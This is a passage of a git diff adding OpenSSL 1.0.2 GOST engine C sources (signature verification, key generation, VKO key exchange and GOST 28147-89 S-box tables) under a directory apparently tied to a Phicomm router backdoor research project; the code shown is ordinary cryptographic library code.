+    tmp = BN_CTX_get(ctx);
+    X = BN_CTX_get(ctx);
+    R = BN_CTX_get(ctx);
+    v = BN_CTX_get(ctx);
+
+    EC_GROUP_get_order(group, order, ctx);
+    pub_key = EC_KEY_get0_public_key(ec);
+    if (BN_is_zero(sig->s) || BN_is_zero(sig->r) ||
+        (BN_cmp(sig->s, order) >= 1) || (BN_cmp(sig->r, order) >= 1)) {
+        GOSTerr(GOST_F_GOST2001_DO_VERIFY,
+                GOST_R_SIGNATURE_PARTS_GREATER_THAN_Q);
+        goto err;
+
+    }
+    md = hashsum2bn(dgst);
+
+    BN_mod(e, md, order, ctx);
+#ifdef DEBUG_SIGN
+    fprintf(stderr, "digest as bignum: ");
+    BN_print_fp(stderr, md);
+    fprintf(stderr, "\ndigest mod q: ");
+    BN_print_fp(stderr, e);
+#endif
+    if (BN_is_zero(e))
+        BN_one(e);
+    v = BN_mod_inverse(v, e, order, ctx);
+    BN_mod_mul(z1, sig->s, v, order, ctx);
+    BN_sub(tmp, order, sig->r);
+    BN_mod_mul(z2, tmp, v, order, ctx);
+#ifdef DEBUG_SIGN
+    fprintf(stderr, "\nInverted digest value: ");
+    BN_print_fp(stderr, v);
+    fprintf(stderr, "\nz1: ");
+    BN_print_fp(stderr, z1);
+    fprintf(stderr, "\nz2: ");
+    BN_print_fp(stderr, z2);
+#endif
+    C = EC_POINT_new(group);
+    if (!EC_POINT_mul(group, C, z1, pub_key, z2, ctx)) {
+        GOSTerr(GOST_F_GOST2001_DO_VERIFY, ERR_R_EC_LIB);
+        goto err;
+    }
+    if (!EC_POINT_get_affine_coordinates_GFp(group, C, X, NULL, ctx)) {
+        GOSTerr(GOST_F_GOST2001_DO_VERIFY, ERR_R_EC_LIB);
+        goto err;
+    }
+    BN_mod(R, X, order, ctx);
+#ifdef DEBUG_SIGN
+    fprintf(stderr, "\nX=");
+    BN_print_fp(stderr, X);
+    fprintf(stderr, "\nX mod q=");
+    BN_print_fp(stderr, R);
+    fprintf(stderr, "\n");
+#endif
+    if (BN_cmp(R, sig->r) != 0) {
+        GOSTerr(GOST_F_GOST2001_DO_VERIFY, GOST_R_SIGNATURE_MISMATCH);
+    } else {
+        ok = 1;
+    }
+ err:
+    EC_POINT_free(C);
+    BN_CTX_end(ctx);
+    BN_CTX_free(ctx);
+    BN_free(md);
+    return ok;
+}
+
+/*
+ * Computes GOST R 34.10-2001 public key
+ *
+ *
+ */
+int gost2001_compute_public(EC_KEY *ec)
+{
+    const EC_GROUP *group = EC_KEY_get0_group(ec);
+    EC_POINT *pub_key = NULL;
+    const BIGNUM *priv_key = NULL;
+    BN_CTX *ctx = NULL;
+    int ok = 0;
+
+    if (!group) {
+        GOSTerr(GOST_F_GOST2001_COMPUTE_PUBLIC,
+                GOST_R_KEY_IS_NOT_INITIALIZED);
+        return 0;
+    }
+    ctx = BN_CTX_new();
+    BN_CTX_start(ctx);
+    if (!(priv_key = EC_KEY_get0_private_key(ec))) {
+        GOSTerr(GOST_F_GOST2001_COMPUTE_PUBLIC, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    pub_key = EC_POINT_new(group);
+    if (!EC_POINT_mul(group, pub_key, priv_key, NULL, NULL, ctx)) {
+        GOSTerr(GOST_F_GOST2001_COMPUTE_PUBLIC, ERR_R_EC_LIB);
+        goto err;
+    }
+    if (!EC_KEY_set_public_key(ec, pub_key)) {
+        GOSTerr(GOST_F_GOST2001_COMPUTE_PUBLIC, ERR_R_EC_LIB);
+        goto err;
+    }
+    ok = 256;
+ err:
+    BN_CTX_end(ctx);
+    EC_POINT_free(pub_key);
+    BN_CTX_free(ctx);
+    return ok;
+}
+
+/*
+ *
+ * Generates GOST R 34.10-2001 keypair
+ *
+ *
+ */
+int gost2001_keygen(EC_KEY *ec)
+{
+    BIGNUM *order = BN_new(), *d = BN_new();
+    const EC_GROUP *group = EC_KEY_get0_group(ec);
+    EC_GROUP_get_order(group, order, NULL);
+
+    do {
+        if (!BN_rand_range(d, order)) {
+            GOSTerr(GOST_F_GOST2001_KEYGEN,
+                    GOST_R_RANDOM_NUMBER_GENERATOR_FAILED);
+            BN_free(d);
+            BN_free(order);
+            return 0;
+        }
+    }
+    while (BN_is_zero(d));
+    EC_KEY_set_private_key(ec, d);
+    BN_free(d);
+    BN_free(order);
+    return gost2001_compute_public(ec);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost2001_keyx.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost2001_keyx.c
new file mode 100644
index 0000000..db1bdc1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost2001_keyx.c
@@ -0,0 +1,292 @@
+/**********************************************************************
+ *                          gost_keyx.c                               *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *   VK0 34.10-2001 key exchange and GOST R 34.10-2001                *
+ *   based PKCS7/SMIME support                                        *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+#include <string.h>
+#include <openssl/objects.h>
+#include "gost89.h"
+#include "gosthash.h"
+#include "e_gost_err.h"
+#include "gost_keywrap.h"
+#include "gost_lcl.h"
+#include "gost2001_keyx.h"
+
+/* Implementation of CryptoPro VKO 34.10-2001 algorithm */
+static int VKO_compute_key(unsigned char *shared_key, size_t shared_key_size,
+                           const EC_POINT *pub_key, EC_KEY *priv_key,
+                           const unsigned char *ukm)
+{
+    unsigned char ukm_be[8], databuf[64], hashbuf[64];
+    BIGNUM *UKM = NULL, *p = NULL, *order = NULL, *X = NULL, *Y = NULL;
+    const BIGNUM *key = EC_KEY_get0_private_key(priv_key);
+    EC_POINT *pnt = EC_POINT_new(EC_KEY_get0_group(priv_key));
+    int i;
+    gost_hash_ctx hash_ctx;
+    BN_CTX *ctx = BN_CTX_new();
+
+    for (i = 0; i < 8; i++) {
+        ukm_be[7 - i] = ukm[i];
+    }
+    BN_CTX_start(ctx);
+    UKM = getbnfrombuf(ukm_be, 8);
+    p = BN_CTX_get(ctx);
+    order = BN_CTX_get(ctx);
+    X = BN_CTX_get(ctx);
+    Y = BN_CTX_get(ctx);
+    EC_GROUP_get_order(EC_KEY_get0_group(priv_key), order, ctx);
+    BN_mod_mul(p, key, UKM, order, ctx);
+    EC_POINT_mul(EC_KEY_get0_group(priv_key), pnt, NULL, pub_key, p, ctx);
+    EC_POINT_get_affine_coordinates_GFp(EC_KEY_get0_group(priv_key),
+                                        pnt, X, Y, ctx);
+    /*
+     * Serialize elliptic curve point same way as we do it when saving key
+     */
+    store_bignum(Y, databuf, 32);
+    store_bignum(X, databuf + 32, 32);
+    /* And reverse byte order of whole buffer */
+    for (i = 0; i < 64; i++) {
+        hashbuf[63 - i] = databuf[i];
+    }
+    init_gost_hash_ctx(&hash_ctx, &GostR3411_94_CryptoProParamSet);
+    start_hash(&hash_ctx);
+    hash_block(&hash_ctx, hashbuf, 64);
+    finish_hash(&hash_ctx, shared_key);
+    done_gost_hash_ctx(&hash_ctx);
+    BN_free(UKM);
+    BN_CTX_end(ctx);
+    BN_CTX_free(ctx);
+    EC_POINT_free(pnt);
+    return 32;
+}
+
+/*
+ * EVP_PKEY_METHOD callback derive. Implements VKO R 34.10-2001
+ * algorithm
+ */
+int pkey_gost2001_derive(EVP_PKEY_CTX *ctx, unsigned char *key,
+                         size_t *keylen)
+{
+    /*
+     * Public key of peer in the ctx field peerkey Our private key in the ctx
+     * pkey ukm is in the algorithm specific context data
+     */
+    EVP_PKEY *my_key = EVP_PKEY_CTX_get0_pkey(ctx);
+    EVP_PKEY *peer_key = EVP_PKEY_CTX_get0_peerkey(ctx);
+    struct gost_pmeth_data *data = EVP_PKEY_CTX_get_data(ctx);
+
+    if (!data->shared_ukm) {
+        GOSTerr(GOST_F_PKEY_GOST2001_DERIVE, GOST_R_UKM_NOT_SET);
+        return 0;
+    }
+
+    if (key == NULL) {
+        *keylen = 32;
+        return 32;
+    }
+
+    *keylen =
+        VKO_compute_key(key, 32,
+                        EC_KEY_get0_public_key(EVP_PKEY_get0(peer_key)),
+                        (EC_KEY *)EVP_PKEY_get0(my_key), data->shared_ukm);
+    return 1;
+}
+
+/*
+ * EVP_PKEY_METHOD callback encrypt
+ * Implementation of GOST2001 key transport, cryptocom variation
+ */
+/*
+ * Generates ephemeral key based on pubk algorithm computes shared key using
+ * VKO and returns filled up GOST_KEY_TRANSPORT structure
+ */
+
+/*
+ * EVP_PKEY_METHOD callback encrypt
+ * Implementation of GOST2001 key transport, cryptopo variation
+ */
+
+int pkey_GOST01cp_encrypt(EVP_PKEY_CTX *pctx, unsigned char *out,
+                          size_t *out_len, const unsigned char *key,
+                          size_t key_len)
+{
+    GOST_KEY_TRANSPORT *gkt = NULL;
+    EVP_PKEY *pubk = EVP_PKEY_CTX_get0_pkey(pctx);
+    struct gost_pmeth_data *data = EVP_PKEY_CTX_get_data(pctx);
+    const struct gost_cipher_info *param = get_encryption_params(NULL);
+    unsigned char ukm[8], shared_key[32], crypted_key[44];
+    int ret = 0;
+    int key_is_ephemeral = 1;
+    gost_ctx cctx;
+    EVP_PKEY *sec_key = EVP_PKEY_CTX_get0_peerkey(pctx);
+    if (data->shared_ukm) {
+        memcpy(ukm, data->shared_ukm, 8);
+    } else if (out) {
+
+        if (RAND_bytes(ukm, 8) <= 0) {
+            GOSTerr(GOST_F_PKEY_GOST01CP_ENCRYPT,
+                    GOST_R_RANDOM_GENERATOR_FAILURE);
+            return 0;
+        }
+    }
+    /* Check for private key in the peer_key of context */
+    if (sec_key) {
+        key_is_ephemeral = 0;
+        if (!gost_get0_priv_key(sec_key)) {
+            GOSTerr(GOST_F_PKEY_GOST01CP_ENCRYPT,
+                    GOST_R_NO_PRIVATE_PART_OF_NON_EPHEMERAL_KEYPAIR);
+            goto err;
+        }
+    } else {
+        key_is_ephemeral = 1;
+        if (out) {
+            sec_key = EVP_PKEY_new();
+            EVP_PKEY_assign(sec_key, EVP_PKEY_base_id(pubk), EC_KEY_new());
+            EVP_PKEY_copy_parameters(sec_key, pubk);
+            if (!gost2001_keygen(EVP_PKEY_get0(sec_key))) {
+                goto err;
+            }
+        }
+    }
+    if (!get_gost_engine_param(GOST_PARAM_CRYPT_PARAMS)
+        && param == gost_cipher_list) {
+        param = gost_cipher_list + 1;
+    }
+    if (out) {
+        VKO_compute_key(shared_key, 32,
+                        EC_KEY_get0_public_key(EVP_PKEY_get0(pubk)),
+                        EVP_PKEY_get0(sec_key), ukm);
+        gost_init(&cctx, param->sblock);
+        keyWrapCryptoPro(&cctx, shared_key, ukm, key, crypted_key);
+    }
+    gkt = GOST_KEY_TRANSPORT_new();
+    if (!gkt) {
+        goto err;
+    }
+    if (!ASN1_OCTET_STRING_set(gkt->key_agreement_info->eph_iv, ukm, 8)) {
+        goto err;
+    }
+    if (!ASN1_OCTET_STRING_set(gkt->key_info->imit, crypted_key + 40, 4)) {
+        goto err;
+    }
+    if (!ASN1_OCTET_STRING_set
+        (gkt->key_info->encrypted_key, crypted_key + 8, 32)) {
+        goto err;
+    }
+    if (key_is_ephemeral) {
+        if (!X509_PUBKEY_set
+            (&gkt->key_agreement_info->ephem_key, out ? sec_key : pubk)) {
+            GOSTerr(GOST_F_PKEY_GOST01CP_ENCRYPT,
+                    GOST_R_CANNOT_PACK_EPHEMERAL_KEY);
+            goto err;
+        }
+    }
+    ASN1_OBJECT_free(gkt->key_agreement_info->cipher);
+    gkt->key_agreement_info->cipher = OBJ_nid2obj(param->nid);
+    if (key_is_ephemeral && sec_key)
+        EVP_PKEY_free(sec_key);
+    if (!key_is_ephemeral) {
+        /* Set control "public key from client certificate used" */
+        if (EVP_PKEY_CTX_ctrl(pctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 3, NULL)
+            <= 0) {
+            GOSTerr(GOST_F_PKEY_GOST01CP_ENCRYPT, GOST_R_CTRL_CALL_FAILED);
+            goto err;
+        }
+    }
+    if ((*out_len = i2d_GOST_KEY_TRANSPORT(gkt, out ? &out : NULL)) > 0)
+        ret = 1;
+    GOST_KEY_TRANSPORT_free(gkt);
+    return ret;
+ err:
+    if (key_is_ephemeral && sec_key)
+        EVP_PKEY_free(sec_key);
+    GOST_KEY_TRANSPORT_free(gkt);
+    return -1;
+}
+
+/*
+ * EVP_PKEY_METHOD callback decrypt
+ * Implementation of GOST2001 key transport, cryptopo variation
+ */
+int pkey_GOST01cp_decrypt(EVP_PKEY_CTX *pctx, unsigned char *key,
+                          size_t *key_len, const unsigned char *in,
+                          size_t in_len)
+{
+    const unsigned char *p = in;
+    EVP_PKEY *priv = EVP_PKEY_CTX_get0_pkey(pctx);
+    GOST_KEY_TRANSPORT *gkt = NULL;
+    int ret = 0;
+    unsigned char wrappedKey[44];
+    unsigned char sharedKey[32];
+    gost_ctx ctx;
+    const struct gost_cipher_info *param = NULL;
+    EVP_PKEY *eph_key = NULL, *peerkey = NULL;
+
+    if (!key) {
+        *key_len = 32;
+        return 1;
+    }
+    gkt = d2i_GOST_KEY_TRANSPORT(NULL, (const unsigned char **)&p, in_len);
+    if (!gkt) {
+        GOSTerr(GOST_F_PKEY_GOST01CP_DECRYPT,
+                GOST_R_ERROR_PARSING_KEY_TRANSPORT_INFO);
+        return -1;
+    }
+
+    /* If key transport structure contains public key, use it */
+    eph_key = X509_PUBKEY_get(gkt->key_agreement_info->ephem_key);
+    if (eph_key) {
+        if (EVP_PKEY_derive_set_peer(pctx, eph_key) <= 0) {
+            GOSTerr(GOST_F_PKEY_GOST01CP_DECRYPT,
+                    GOST_R_INCOMPATIBLE_PEER_KEY);
+            goto err;
+        }
+    } else {
+        /* Set control "public key from client certificate used" */
+        if (EVP_PKEY_CTX_ctrl(pctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 3, NULL)
+            <= 0) {
+            GOSTerr(GOST_F_PKEY_GOST01CP_DECRYPT, GOST_R_CTRL_CALL_FAILED);
+            goto err;
+        }
+    }
+    peerkey = EVP_PKEY_CTX_get0_peerkey(pctx);
+    if (!peerkey) {
+        GOSTerr(GOST_F_PKEY_GOST01CP_DECRYPT, GOST_R_NO_PEER_KEY);
+        goto err;
+    }
+
+    param = get_encryption_params(gkt->key_agreement_info->cipher);
+    if (!param) {
+        goto err;
+    }
+
+    gost_init(&ctx, param->sblock);
+    OPENSSL_assert(gkt->key_agreement_info->eph_iv->length == 8);
+    memcpy(wrappedKey, gkt->key_agreement_info->eph_iv->data, 8);
+    OPENSSL_assert(gkt->key_info->encrypted_key->length == 32);
+    memcpy(wrappedKey + 8, gkt->key_info->encrypted_key->data, 32);
+    OPENSSL_assert(gkt->key_info->imit->length == 4);
+    memcpy(wrappedKey + 40, gkt->key_info->imit->data, 4);
+    VKO_compute_key(sharedKey, 32,
+                    EC_KEY_get0_public_key(EVP_PKEY_get0(peerkey)),
+                    EVP_PKEY_get0(priv), wrappedKey);
+    if (!keyUnwrapCryptoPro(&ctx, sharedKey, wrappedKey, key)) {
+        GOSTerr(GOST_F_PKEY_GOST01CP_DECRYPT,
+                GOST_R_ERROR_COMPUTING_SHARED_KEY);
+        goto err;
+    }
+
+    ret = 1;
+ err:
+    if (eph_key)
+        EVP_PKEY_free(eph_key);
+    if (gkt)
+        GOST_KEY_TRANSPORT_free(gkt);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost2001_keyx.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost2001_keyx.h
new file mode 100644
index 0000000..2d29113
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost2001_keyx.h
@@ -0,0 +1,10 @@
+GOST_KEY_TRANSPORT *make_rfc4490_keytransport_2001(EVP_PKEY *pubk,
+                                                   BIGNUM *eph_key,
+                                                   const unsigned char *key,
+                                                   size_t keylen,
+                                                   unsigned char *ukm,
+                                                   size_t ukm_len);
+
+int decrypt_rfc4490_shared_key_2001(EVP_PKEY *priv,
+                                    GOST_KEY_TRANSPORT * gkt,
+                                    unsigned char *key_buf, int key_buf_len);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost89.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost89.c
new file mode 100644
index 0000000..4ff4ddd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost89.c
@@ -0,0 +1,576 @@
+/**********************************************************************
+ *                        gost89.c                                    *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *          Implementation of GOST 28147-89 encryption algorithm      *
+ *            No OpenSSL libraries required to compile and use        *
+ *                              this code                             *
+ **********************************************************************/
+#include <string.h>
+#include "gost89.h"
+/*-
+   Substitution blocks from RFC 4357
+
+   Note: our implementation of gost 28147-89 algorithm
+   uses S-box matrix rotated 90 degrees counterclockwise, relative to
+   examples given in RFC.
+
+
+*/
+
+/* Substitution blocks from test examples for GOST R 34.11-94*/
+gost_subst_block GostR3411_94_TestParamSet = {
+    {0X1, 0XF, 0XD, 0X0, 0X5, 0X7, 0XA, 0X4, 0X9, 0X2, 0X3, 0XE, 0X6, 0XB,
+     0X8, 0XC}
+    ,
+    {0XD, 0XB, 0X4, 0X1, 0X3, 0XF, 0X5, 0X9, 0X0, 0XA, 0XE, 0X7, 0X6, 0X8,
+     0X2, 0XC}
+    ,
+    {0X4, 0XB, 0XA, 0X0, 0X7, 0X2, 0X1, 0XD, 0X3, 0X6, 0X8, 0X5, 0X9, 0XC,
+     0XF, 0XE}
+    ,
+    {0X6, 0XC, 0X7, 0X1, 0X5, 0XF, 0XD, 0X8, 0X4, 0XA, 0X9, 0XE, 0X0, 0X3,
+     0XB, 0X2}
+    ,
+    {0X7, 0XD, 0XA, 0X1, 0X0, 0X8, 0X9, 0XF, 0XE, 0X4, 0X6, 0XC, 0XB, 0X2,
+     0X5, 0X3}
+    ,
+    {0X5, 0X8, 0X1, 0XD, 0XA, 0X3, 0X4, 0X2, 0XE, 0XF, 0XC, 0X7, 0X6, 0X0,
+     0X9, 0XB}
+    ,
+    {0XE, 0XB, 0X4, 0XC, 0X6, 0XD, 0XF, 0XA, 0X2, 0X3, 0X8, 0X1, 0X0, 0X7,
+     0X5, 0X9}
+    ,
+    {0X4, 0XA, 0X9, 0X2, 0XD, 0X8, 0X0, 0XE, 0X6, 0XB, 0X1, 0XC, 0X7, 0XF,
+     0X5, 0X3}
+};
+
+/* Substitution blocks for hash function 1.2.643.2.9.1.6.1  */
+gost_subst_block GostR3411_94_CryptoProParamSet = {
+    {0x1, 0x3, 0xA, 0x9, 0x5, 0xB, 0x4, 0xF, 0x8, 0x6, 0x7, 0xE, 0xD, 0x0,
+     0x2, 0xC}
+    ,
+    {0xD, 0xE, 0x4, 0x1, 0x7, 0x0, 0x5, 0xA, 0x3, 0xC, 0x8, 0xF, 0x6, 0x2,
+     0x9, 0xB}
+    ,
+    {0x7, 0x6, 0x2, 0x4, 0xD, 0x9, 0xF, 0x0, 0xA, 0x1, 0x5, 0xB, 0x8, 0xE,
+     0xC, 0x3}
+    ,
+    {0x7, 0x6, 0x4, 0xB, 0x9, 0xC, 0x2, 0xA, 0x1, 0x8, 0x0, 0xE, 0xF, 0xD,
+     0x3, 0x5}
+    ,
+    {0x4, 0xA, 0x7, 0xC, 0x0, 0xF, 0x2, 0x8, 0xE, 0x1, 0x6, 0x5, 0xD, 0xB,
+     0x9, 0x3}
+    ,
+    {0x7, 0xF, 0xC, 0xE, 0x9, 0x4, 0x1, 0x0, 0x3, 0xB, 0x5, 0x2, 0x6, 0xA,
+     0x8, 0xD}
+    ,
+    {0x5, 0xF, 0x4, 0x0, 0x2, 0xD, 0xB, 0x9, 0x1, 0x7, 0x6, 0x3, 0xC, 0xE,
+     0xA, 0x8}
+    ,
+    {0xA, 0x4, 0x5, 0x6, 0x8, 0x1, 0x3, 0x7, 0xD, 0xC, 0xE, 0x0, 0x9, 0x2,
+     0xB, 0xF}
+};
+
+/* Test paramset from GOST 28147 */
+gost_subst_block Gost28147_TestParamSet = {
+    {0xC, 0x6, 0x5, 0x2, 0xB, 0x0, 0x9, 0xD, 0x3, 0xE, 0x7, 0xA, 0xF, 0x4,
+     0x1, 0x8}
+    ,
+    {0x9, 0xB, 0xC, 0x0, 0x3, 0x6, 0x7, 0x5, 0x4, 0x8, 0xE, 0xF, 0x1, 0xA,
+     0x2, 0xD}
+    ,
+    {0x8, 0xF, 0x6, 0xB, 0x1, 0x9, 0xC, 0x5, 0xD, 0x3, 0x7, 0xA, 0x0, 0xE,
+     0x2, 0x4}
+    ,
+    {0x3, 0xE, 0x5, 0x9, 0x6, 0x8, 0x0, 0xD, 0xA, 0xB, 0x7, 0xC, 0x2, 0x1,
+     0xF, 0x4}
+    ,
+    {0xE, 0x9, 0xB, 0x2, 0x5, 0xF, 0x7, 0x1, 0x0, 0xD, 0xC, 0x6, 0xA, 0x4,
+     0x3, 0x8}
+    ,
+    {0xD, 0x8, 0xE, 0xC, 0x7, 0x3, 0x9, 0xA, 0x1, 0x5, 0x2, 0x4, 0x6, 0xF,
+     0x0, 0xB}
+    ,
+    {0xC, 0x9, 0xF, 0xE, 0x8, 0x1, 0x3, 0xA, 0x2, 0x7, 0x4, 0xD, 0x6, 0x0,
+     0xB, 0x5}
+    ,
+    {0x4, 0x2, 0xF, 0x5, 0x9, 0x1, 0x0, 0x8, 0xE, 0x3, 0xB, 0xC, 0xD, 0x7,
+     0xA, 0x6}
+};
+
+/* 1.2.643.2.2.31.1 */
+gost_subst_block Gost28147_CryptoProParamSetA = {
+    {0xB, 0xA, 0xF, 0x5, 0x0, 0xC, 0xE, 0x8, 0x6, 0x2, 0x3, 0x9, 0x1, 0x7,
+     0xD, 0x4}
+    ,
+    {0x1, 0xD, 0x2, 0x9, 0x7, 0xA, 0x6, 0x0, 0x8, 0xC, 0x4, 0x5, 0xF, 0x3,
+     0xB, 0xE}
+    ,
+    {0x3, 0xA, 0xD, 0xC, 0x1, 0x2, 0x0, 0xB, 0x7, 0x5, 0x9, 0x4, 0x8, 0xF,
+     0xE, 0x6}
+    ,
+    {0xB, 0x5, 0x1, 0x9, 0x8, 0xD, 0xF, 0x0, 0xE, 0x4, 0x2, 0x3, 0xC, 0x7,
+     0xA, 0x6}
+    ,
+    {0xE, 0x7, 0xA, 0xC, 0xD, 0x1, 0x3, 0x9, 0x0, 0x2, 0xB, 0x4, 0xF, 0x8,
+     0x5, 0x6}
+    ,
+    {0xE, 0x4, 0x6, 0x2, 0xB, 0x3, 0xD, 0x8, 0xC, 0xF, 0x5, 0xA, 0x0, 0x7,
+     0x1, 0x9}
+    ,
+    {0x3, 0x7, 0xE, 0x9, 0x8, 0xA, 0xF, 0x0, 0x5, 0x2, 0x6, 0xC, 0xB, 0x4,
+     0xD, 0x1}
+    ,
+    {0x9, 0x6, 0x3, 0x2, 0x8, 0xB, 0x1, 0x7, 0xA, 0x4, 0xE, 0xF, 0xC, 0x0,
+     0xD, 0x5}
+};
+
+/* 1.2.643.2.2.31.2 */
+gost_subst_block Gost28147_CryptoProParamSetB = {
+    {0x0, 0x4, 0xB, 0xE, 0x8, 0x3, 0x7, 0x1, 0xA, 0x2, 0x9, 0x6, 0xF, 0xD,
+     0x5, 0xC}
+    ,
+    {0x5, 0x2, 0xA, 0xB, 0x9, 0x1, 0xC, 0x3, 0x7, 0x4, 0xD, 0x0, 0x6, 0xF,
+     0x8, 0xE}
+    ,
+    {0x8, 0x3, 0x2, 0x6, 0x4, 0xD, 0xE, 0xB, 0xC, 0x1, 0x7, 0xF, 0xA, 0x0,
+     0x9, 0x5}
+    ,
+    {0x2, 0x7, 0xC, 0xF, 0x9, 0x5, 0xA, 0xB, 0x1, 0x4, 0x0, 0xD, 0x6, 0x8,
+     0xE, 0x3}
+    ,
+    {0x7, 0x5, 0x0, 0xD, 0xB, 0x6, 0x1, 0x2, 0x3, 0xA, 0xC, 0xF, 0x4, 0xE,
+     0x9, 0x8}
+    ,
+    {0xE, 0xC, 0x0, 0xA, 0x9, 0x2, 0xD, 0xB, 0x7, 0x5, 0x8, 0xF, 0x3, 0x6,
+     0x1, 0x4}
+    ,
+    {0x0, 0x1, 0x2, 0xA, 0x4, 0xD, 0x5, 0xC, 0x9, 0x7, 0x3, 0xF, 0xB, 0x8,
+     0x6, 0xE}
+    ,
+    {0x8, 0x4, 0xB, 0x1, 0x3, 0x5, 0x0, 0x9, 0x2, 0xE, 0xA, 0xC, 0xD, 0x6,
+     0x7, 0xF}
+};
+
+/* 1.2.643.2.2.31.3 */
+gost_subst_block Gost28147_CryptoProParamSetC = {
+    {0x7, 0x4, 0x0, 0x5, 0xA, 0x2, 0xF, 0xE, 0xC, 0x6, 0x1, 0xB, 0xD, 0x9,
+     0x3, 0x8}
+    ,
+    {0xA, 0x9, 0x6, 0x8, 0xD, 0xE, 0x2, 0x0, 0xF, 0x3, 0x5, 0xB, 0x4, 0x1,
+     0xC, 0x7}
+    ,
+    {0xC, 0x9, 0xB, 0x1, 0x8, 0xE, 0x2, 0x4, 0x7, 0x3, 0x6, 0x5, 0xA, 0x0,
+     0xF, 0xD}
+    ,
+    {0x8, 0xD, 0xB, 0x0, 0x4, 0x5, 0x1, 0x2, 0x9, 0x3, 0xC, 0xE, 0x6, 0xF,
+     0xA, 0x7}
+    ,
+    {0x3, 0x6, 0x0, 0x1, 0x5, 0xD, 0xA, 0x8, 0xB, 0x2, 0x9, 0x7, 0xE, 0xF,
+     0xC, 0x4}
+    ,
+    {0x8, 0x2, 0x5, 0x0, 0x4, 0x9, 0xF, 0xA, 0x3, 0x7, 0xC, 0xD, 0x6, 0xE,
+     0x1, 0xB}
+    ,
+    {0x0, 0x1, 0x7, 0xD, 0xB, 0x4, 0x5, 0x2, 0x8, 0xE, 0xF, 0xC, 0x9, 0xA,
+     0x6, 0x3}
+    ,
+    {0x1, 0xB, 0xC, 0x2, 0x9, 0xD, 0x0, 0xF, 0x4, 0x5, 0x8, 0xE, 0xA, 0x7,
+     0x6, 0x3}
+};
+
+/* 1.2.643.2.2.31.4 */
+gost_subst_block Gost28147_CryptoProParamSetD = {
+    {0x1, 0xA, 0x6, 0x8, 0xF, 0xB, 0x0, 0x4, 0xC, 0x3, 0x5, 0x9, 0x7, 0xD,
+     0x2, 0xE}
+    ,
+    {0x3, 0x0, 0x6, 0xF, 0x1, 0xE, 0x9, 0x2, 0xD, 0x8, 0xC, 0x4, 0xB, 0xA,
+     0x5, 0x7}
+    ,
+    {0x8, 0x0, 0xF, 0x3, 0x2, 0x5, 0xE, 0xB, 0x1, 0xA, 0x4, 0x7, 0xC, 0x9,
+     0xD, 0x6}
+    ,
+    {0x0, 0xC, 0x8, 0x9, 0xD, 0x2, 0xA, 0xB, 0x7, 0x3, 0x6, 0x5, 0x4, 0xE,
+     0xF, 0x1}
+    ,
+    {0x1, 0x5, 0xE, 0xC, 0xA, 0x7, 0x0, 0xD, 0x6, 0x2, 0xB, 0x4, 0x9, 0x3,
+     0xF, 0x8}
+    ,
+    {0x1, 0xC, 0xB, 0x0, 0xF, 0xE, 0x6, 0x5, 0xA, 0xD, 0x4, 0x8, 0x9, 0x3,
+     0x7, 0x2}
+    ,
+    {0xB, 0x6, 0x3, 0x4, 0xC, 0xF, 0xE, 0x2, 0x7, 0xD, 0x8, 0x0, 0x5, 0xA,
+     0x9, 0x1}
+    ,
+    {0xF, 0xC, 0x2, 0xA, 0x6, 0x4, 0x5, 0x0, 0x7, 0x9, 0xE, 0xD, 0x1, 0xB,
+     0x8, 0x3}
+};
+
+const byte CryptoProKeyMeshingKey[] = {
+    0x69, 0x00, 0x72, 0x22, 0x64, 0xC9, 0x04, 0x23,
+    0x8D, 0x3A, 0xDB, 0x96, 0x46, 0xE9, 0x2A, 0xC4,
+    0x18, 0xFE, 0xAC, 0x94, 0x00, 0xED, 0x07, 0x12,
+    0xC0, 0x86, 0xDC, 0xC2, 0xEF, 0x4C, 0xA9, 0x2B
+};
+
+/* Initialization of gost_ctx subst blocks*/
+static void kboxinit(gost_ctx * c, const gost_subst_block * b)
+{
+    int i;
+
+    for (i = 0; i < 256; i++) {
+        c->k87[i] = (word32) (b->k8[i >> 4] << 4 | b->k7[i & 15]) << 24;
+        c->k65[i] = (b->k6[i >> 4] << 4 | b->k5[i & 15]) << 16;
+        c->k43[i] = (b->k4[i >> 4] << 4 | b->k3[i & 15]) << 8;
+        c->k21[i] = b->k2[i >> 4] << 4 | b->k1[i & 15];
+
+    }
+}
+
+/* Part of GOST 28147 algorithm moved into separate function */
+static word32 f(gost_ctx * c, word32 x)
+{
+    x = c->k87[x >> 24 & 255] | c->k65[x >> 16 & 255] |
+        c->k43[x >> 8 & 255] | c->k21[x & 255];
+    /* Rotate left 11 bits */
+    return x << 11 | x >> (32 - 11);
+}
+
+/* Low-level encryption routine - encrypts one 64 bit block*/
+void gostcrypt(gost_ctx * c, const byte * in, byte * out)
+{
+    register word32 n1, n2;     /* As named in the GOST */
+    n1 = in[0] | (in[1] << 8) | (in[2] << 16) | ((word32) in[3] << 24);
+    n2 = in[4] | (in[5] << 8) | (in[6] << 16) | ((word32) in[7] << 24);
+    /* Instead of swapping halves, swap names each round */
+
+    n2 ^= f(c, n1 + c->k[0]);
+    n1 ^= f(c, n2 + c->k[1]);
+    n2 ^= f(c, n1 + c->k[2]);
